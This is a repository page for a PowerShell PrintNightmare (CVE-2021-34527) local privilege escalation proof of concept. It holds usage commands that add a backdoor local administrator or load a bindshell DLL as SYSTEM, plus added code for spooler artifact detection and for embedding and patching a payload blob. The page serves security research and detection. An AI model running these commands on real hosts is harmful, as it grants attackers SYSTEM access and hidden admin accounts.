  • Stars: 222
  • Rank: 172,939 (Top 4 %)
  • Language: PowerShell
  • Created: almost 3 years ago
  • Updated: almost 3 years ago


Repository Details

CVE-2021-34527 - PrintNightmare LPE (PowerShell)

Caleb Stewart | John Hammond | July 1, 2021


UPDATE July 2 2021: Microsoft has released an advisory on CVE-2021-34527, designating that specific identifier as the PrintNightmare vulnerability. Previously, the community had assumed CVE-2021-1675 "was PrintNightmare", since the June 8 patch did not resolve this issue. This repository is identical to the original, just under the different CVE name.

CVE-2021-34527 is a critical remote code execution and local privilege escalation vulnerability in the Windows Print Spooler service, dubbed "PrintNightmare."

Proof-of-concept exploits have been released (Python, C++) for the remote code execution capability, and a C# rendition for local privilege escalation. We had not seen a native implementation in pure PowerShell, so we wanted to try our hand at refining and recrafting the exploit.

This PowerShell script performs local privilege escalation (LPE) using the PrintNightmare technique: it registers a printer driver whose DLL is loaded by the Print Spooler, which runs as SYSTEM.


This has been tested on Windows Server 2016 and Windows Server 2019.

Usage

Add a new user to the local administrators group by default:

Import-Module .\cve-2021-34527.ps1
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default

Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure" # pick the driver by name and choose the new credentials

Supply a custom DLL payload to run anything else you like in the spooler's SYSTEM context:

Import-Module .\cve-2021-34527.ps1
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"
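A pre-flight and post-run check to go with the usage above. This is an added example, not code from the Caleb Stewart / John Hammond repository: it reports whether the Spooler service is running and whether the current user is already an administrator, lists the installed Version-3 printer drivers (the pool Invoke-Nightmare picks from, and what -DriverName filters), shows recently written DLLs under the spool driver directory, and pulls the PrintService events a driver install produces (316 in the Operational log, which is off by default, and 808 in the Admin log when the spooler fails to load a plug-in module). The function names are my own.

```powershell
#Requires -Version 5.1
# Added example: inspect the local Print Spooler state Invoke-Nightmare
# relies on, and the artifacts a driver-install LPE leaves behind.
# Function names are assumptions made for this example.

function Get-SpoolerState {
    # The technique only works if the Print Spooler service is running locally.
    $svc       = Get-Service -Name Spooler -ErrorAction Stop
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    [pscustomobject]@{
        Service      = $svc.Name
        Status       = $svc.Status
        StartType    = $svc.StartType
        RunningAs    = $identity.Name
        IsLocalAdmin = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    }
}

function Get-InstalledPrinterDriver {
    # Version-3 drivers for the local environment. Invoke-Nightmare takes the
    # first one (or the one matching -DriverName) and reuses its file paths.
    param([string]$DriverName)
    $drivers = Get-PrinterDriver -ErrorAction Stop | Where-Object { $_.MajorVersion -eq 3 }
    if ($DriverName) {
        $drivers = $drivers | Where-Object { $_.Name -like "*$DriverName*" }
    }
    $drivers | Select-Object Name, PrinterEnvironment, MajorVersion, DriverPath, DataFile, ConfigFile
}

function Get-SpoolDriverArtifact {
    # Newly registered driver DLLs are copied under the spool driver directory.
    # A recently written DLL there that is not Microsoft-signed deserves a look.
    param([int]$Days = 7)
    $dir = Join-Path $env:SystemRoot 'System32\spool\drivers'
    Get-ChildItem -Path $dir -Recurse -Filter '*.dll' -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-$Days) } |
        ForEach-Object {
            $sig    = Get-AuthenticodeSignature -FilePath $_.FullName
            $signer = '(unsigned)'
            if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }
            [pscustomobject]@{
                Path          = $_.FullName
                LastWriteTime = $_.LastWriteTime
                Signature     = $sig.Status
                Signer        = $signer
            }
        }
}

function Get-PrintServiceDriverEvent {
    # Event 316 (PrintService/Operational) records a driver being added or
    # updated; that log is disabled by default, enable it with
    #   wevtutil sl Microsoft-Windows-PrintService/Operational /e:true
    # Event 808 (PrintService/Admin) records the spooler failing to load a
    # plug-in module, which a blocked or malformed payload DLL produces.
    param([int]$Days = 7)
    $since   = (Get-Date).AddDays(-$Days)
    $filters = @(
        @{ LogName = 'Microsoft-Windows-PrintService/Operational'; Id = 316; StartTime = $since }
        @{ LogName = 'Microsoft-Windows-PrintService/Admin';       Id = 808; StartTime = $since }
    )
    foreach ($filter in $filters) {
        Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
            Select-Object TimeCreated, Id, LogName, Message
    }
}

# Usage
Get-SpoolerState            | Format-List
Get-InstalledPrinterDriver  | Format-Table -AutoSize
Get-SpoolDriverArtifact     | Format-Table -AutoSize
Get-PrintServiceDriverEvent | Format-List
```

Run the driver listing before Invoke-Nightmare to see which driver it will pick by default, and the artifact and event queries afterwards (or on a suspect host) to confirm what the driver install left behind.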

Details

  • The LPE technique needs neither remote RPC nor SMB: it only calls the local Print Spooler API, so it works without any network path to the spooler.
  • The script embeds a Base64-encoded, GZIP-compressed DLL payload that is patched according to your arguments, to easily add a new user to the local administrators group.
  • The script embeds methods from PowerSploit/PowerUp to reflectively access the Win32 APIs, so no C# helper has to be compiled with Add-Type.
  • The script does not loop through all installed printer drivers to find an appropriate DLL path; it simply takes the first driver it finds and derives the path from that. Use -DriverName to select a specific driver if the first one does not work.
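The embed-and-patch step described in the second bullet, as an added illustration rather than the PoC's own code. The "DLL" is a constructed byte string with two 32-byte placeholder fields (`__USER__`, `__PASS__`); the marker names, the fixed slot width and the Find-ByteSequence helper are assumptions made for this example, not the layout of the real nightmare DLL.

```powershell
#Requires -Version 5.1
# Added example: carry a DLL inside a script as a Base64-encoded GZIP blob and
# patch caller-supplied values into it before writing it out. The payload here
# is a constructed byte string with placeholder fields, not a real PE, and the
# marker names / slot size are assumptions for the illustration.

function ConvertTo-EmbeddedBlob {
    # GZip-compress raw bytes and Base64-encode the result so they can be
    # pasted into a script as one string literal.
    param([Parameter(Mandatory)][byte[]]$Bytes)
    $ms = New-Object System.IO.MemoryStream
    $gz = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress, $true)
    $gz.Write($Bytes, 0, $Bytes.Length)
    $gz.Dispose()
    [Convert]::ToBase64String($ms.ToArray())
}

function ConvertFrom-EmbeddedBlob {
    # Reverse of ConvertTo-EmbeddedBlob: Base64-decode, then GZip-inflate.
    param([Parameter(Mandatory)][string]$Blob)
    $in  = New-Object System.IO.MemoryStream(,[Convert]::FromBase64String($Blob))
    $gz  = New-Object System.IO.Compression.GZipStream($in, [System.IO.Compression.CompressionMode]::Decompress)
    $out = New-Object System.IO.MemoryStream
    $gz.CopyTo($out)
    $gz.Dispose()
    $out.ToArray()
}

function Find-ByteSequence {
    # First offset of $Needle inside $Haystack, or -1 if absent.
    param([byte[]]$Haystack, [byte[]]$Needle)
    for ($i = 0; $i -le $Haystack.Length - $Needle.Length; $i++) {
        $match = $true
        for ($j = 0; $j -lt $Needle.Length; $j++) {
            if ($Haystack[$i + $j] -ne $Needle[$j]) { $match = $false; break }
        }
        if ($match) { return $i }
    }
    return -1
}

function Set-PayloadString {
    # Overwrite a fixed-width, NUL-terminated ASCII field in place. A string
    # literal compiled into a PE cannot grow, so the new value must fit in the
    # slot the placeholder reserved; the rest of the slot is zero-filled.
    param(
        [Parameter(Mandatory)][byte[]]$Bytes,
        [Parameter(Mandatory)][string]$Placeholder,
        [Parameter(Mandatory)][string]$Value,
        [int]$SlotSize = 32
    )
    $offset = Find-ByteSequence -Haystack $Bytes -Needle ([Text.Encoding]::ASCII.GetBytes($Placeholder))
    if ($offset -lt 0) { throw "placeholder '$Placeholder' not found in payload" }
    if ($Value.Length -ge $SlotSize) { throw "'$Value' does not fit in a $SlotSize-byte slot (NUL terminator included)" }
    $slot = New-Object byte[] $SlotSize                  # zero-filled
    [Text.Encoding]::ASCII.GetBytes($Value).CopyTo($slot, 0)
    [Array]::Copy($slot, 0, $Bytes, $offset, $SlotSize)  # modifies $Bytes in place
    $Bytes
}

function New-FakePayload {
    # Constructed stand-in for the DLL: a 16-byte header followed by two 32-byte fields.
    $user = New-Object byte[] 32
    $pass = New-Object byte[] 32
    [Text.Encoding]::ASCII.GetBytes('__USER__').CopyTo($user, 0)
    [Text.Encoding]::ASCII.GetBytes('__PASS__').CopyTo($pass, 0)
    [byte[]]([Text.Encoding]::ASCII.GetBytes('MZ-fake-payload-') + $user + $pass)
}

# Usage: the $blob string is what a script would embed as a literal.
$blob = ConvertTo-EmbeddedBlob -Bytes (New-FakePayload)
$dll  = ConvertFrom-EmbeddedBlob -Blob $blob
$dll  = Set-PayloadString -Bytes $dll -Placeholder '__USER__' -Value 'adm1n'
$dll  = Set-PayloadString -Bytes $dll -Placeholder '__PASS__' -Value 'P@ssw0rd'
$path = Join-Path $env:TEMP 'patched-payload.bin'
[IO.File]::WriteAllBytes($path, $dll)
"wrote $($dll.Length) bytes to $path; user field now reads '$([Text.Encoding]::ASCII.GetString($dll, 16, 5))'"
```

The in-place overwrite is the reason the slot size matters: a value longer than the reserved field would spill into whatever the compiler placed after it, so the function refuses rather than corrupting the payload.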

More Repositories

1. ctf-katana (2,371 stars): This repository aims to hold suggestions (and hopefully/eventually code) for CTF challenges. The "project" is nicknamed Katana.
2. msdt-follina (Python, 1,600 stars): Codebase to generate an msdt-follina payload
3. katana (Python, 1,211 stars): Katana - Automatic CTF Challenge Solver in Python3
4. poor-mans-pentest (Shell, 540 stars): This is a collection of the code that I have written for the Poor Man's Pentest presentation.
5. security-resources (379 stars): A communal outpouring of online resources for learning different things in cybersecurity
6. vbe-decoder (Python, 176 stars): A Python3 script to decode an encoded VBScript file, often seen with a .vbe file extension
7. oscp-notetaking (Shell, 174 stars): This repository houses some of the small scripts I used to quickly document throughout my OSCP course. This was referenced on YouTube, and should be made available to others!
8. ignition_key (Shell, 137 stars): This is a small BASH script to quickly set up all the tools I would want and need on a new machine.
9. labs (111 stars): Free and publicly available training labs and exercises, for quick copy-and-paste demonstrations, learning and education.
10. active_directory (PowerShell, 111 stars): Notes and resources for the Active Directory YouTube series on https://youtube.com/JohnHammond010
11. johnhammond.org (HTML, 72 stars): The code and material for my personal open-source website. (Flask, Gunicorn, Certbot)
12. archlinux (Shell, 70 stars): These are my notes and setup scripts while installing and preparing my Arch Linux environment.
13. pyminify (Python, 66 stars): Compress a Python script to a command-line one-liner
14. intro2linux (Python, 63 stars): This is a clone of the Introduction To Linux repo that I developed for the class I taught at the US Coast Guard Academy.
15. thm (PowerShell, 56 stars): My ad hoc and abhorrent notes and work for TryHackMe machines. This repository is for personal use but is made public in case others somehow benefit from it.
16. binnim (Nim, 43 stars): Shitty Nim code that reads in a file and converts it into \x hex representation, for the use of shellcode binaries.
17. c2c2 (39 stars): My new C2 framework
18. htbbizctf2021 (PowerShell, 38 stars): Code and notes for the 2021 HackTheBox Business CTF
19. CVE-2012-2982 (Python, 38 stars): A Python replicated exploit for Webmin 1.580 /file/show.cgi Remote Code Execution
20. notes (36 stars): An Obsidian vault to GitHub Pages workflow to hopefully make me take notes
21. wfi (28 stars): Windows File Integrity -- an archive of information on installed Windows binaries.
22. misfortune-ctf-challenge (Dockerfile, 28 stars): A small binary exploitation challenge to demonstrate a typical return2libc attack
23. netstatgo (Go, 27 stars): Crappy Golang code to list local listening ports and their associated processes.
24. overthewire_natas_solutions (Python, 25 stars): As requested on YouTube, this is an archive of my Python scripts and code that I've used to solve the Natas challenges from OverTheWire.
25. underthewire (PowerShell, 24 stars): These are notes and code from my experience working through the UnderTheWire wargames.
26. hackersyntax (Shell, 23 stars)
27. training_wheels-public (Python, 22 stars): The teaching vessel and "interactive textbook" that I am building for the Intro to Linux class at the USCGA.
28. fakemsf (Ruby, 21 stars): Fake msfconsole for use in demonstrations
29. CVE-2020-35846 (Python, 16 stars): Python PoC for CVE-2020-35846 targeting Cockpit 0.11.1
30. devops (16 stars)
31. CVE-2021-4034 (16 stars): Bash implementation of CVE-2021-4034
32. sshkeys (15 stars): A weaponized technique for SSH to accept an inserted public/private key. Useful for red team effects.
33. pcdc2019 (Shell, 14 stars): This is a repository to house convenient things for the 2019 PCDC competition.
34. bbfuzzer (Python, 11 stars): Nightmare code I wrote and used for the Cyberstakes 2016 Breaking Binaries challenge. Managed to crack a good 200+ programs, though, more than any other team! This is the catalyst to a better utility: peach.
35. cipherplane (Python, 11 stars): This Python code will quickly find duplicates or similarities in sets of data.
36. sandbox (Python, 10 stars): My 1/c Senior Design project (at least the first half of it), aiming to synthesize virtualization and automation. I take advantage of VMware vCenter and PowerCLI to automate the process of creating a dynamic network.
37. autoctfd (10 stars): This is a poor man's framework to automate the creation of a CTFd instance, dynamically recreating challenges and the interface.
38. pim (Shell, 7 stars): "...my own endeavor to learn low-level programming and develop a kernel or operating system". I have not touched this in years and I consider it inactive at the current moment.
39. primefac_fork (Python, 4 stars): a crappy "hack" or fork of the Python module primefac, but with a different modular inverse function
40. bearshop (Python, 4 stars): The online "Cadet Store" that my classmates asked me to build
41. stix-attack-flow (Python, 4 stars): Crappy code to work with MITRE Attack Flows with the stix2 Python library
42. fake_cdx_forum (HTML, 4 stars): This is the fake website forum I created in JavaScript before CDX 2017.
43. cdx_2016 (Python, 3 stars): Relics and artifacts from the CDX 2016 exercise that should help us prepare for the future
44. circle (PowerShell, 3 stars): This is a testbed for CircleCI
45. go-for-blaine (2 stars)